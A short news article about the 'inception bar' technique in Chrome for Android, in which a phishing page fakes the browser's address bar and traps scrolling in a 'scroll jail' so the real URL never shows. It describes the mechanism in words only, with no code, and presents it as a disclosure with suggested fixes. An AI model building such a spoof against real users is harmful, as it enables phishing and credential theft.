Security conscious users are still wary of using mobile banking apps, for the very reason they cannot clearly determine if the bank app connects their online banking account to the bank’s servers in an encrypted fashion. The usual verification of a TLS connection is by checking the address bar of the web browser, it provides visual cues that the website being visited is encrypted. However, in a banking app, there is no address bar, since such feature can only usually be found on a web browser only (sometimes in media players such as VLC, where a URL of the media can be used for playback).
But, is the indication of a TLS encryption in the address bar a sure fire way to assure that it really is an encrypted page? Seems like this is not always the case, especially with Chrome for Android. Google Chrome in Android by default suppress the entire URL after loading the website in the browser’s body. This helps to lessen the visual clutter, but according to James Fisher, a developer this was a big mistake as the behavior can be used for malicious redirection to a phishing website.
Another possible trick using the behavior is for the phisher to “game Chrome’s design”, hiding the address bar discriminating the user from viewing the possibility that he/she is still in an encrypted page. “Normally, when the user scrolls up, Chrome will redisplay the true URL bar. But we can trick Chrome so that it never redisplays the true URL bar. Once Chrome hides the URL bar, we move the entire page content into a ‘scroll jail’ – that is, a new element with overflow:scroll. Then the user thinks they’re scrolling up in the page, but in fact they’re only scrolling up in the scroll jail. Like a dream in Inception, the user believes they’re in their own browser, but they’re actually in a browser within their browser,” explained James Fisher, web developer.
James Fisher’s proof-of-concept is published in his website jameshfisher.com, where he discussed how he was able to screenshot HSBC’s webpage and create an interactive inception bar in Chrome out of nowhere. This technique can cause users to believe that they are truly in WebsiteX, even if there are really in dangerous WebsiteY.
“How can you guard yourself against this attack? I don’t really know. I see it as a security flaw in Chrome. But what’s the fix? There’s a trade-off, between maximizing screen space on one hand, and retaining trusted screen space on the other. One compromise would be for Chrome to retain a small amount of screen space above the ‘line of death’ instead of giving up literally all screen space to the web page. Chrome could use this space to signal that ‘the URL bar is currently collapse’, e.g. by displaying the shadow of an almost-hidden URL bar,” added Fisher.
At the time of this writing, there is no fix yet for the bug. But the suggestion of switch browser, especially to a non-Blink browser such as Firefox Mobile is the way to go until the flaw is patched by Google.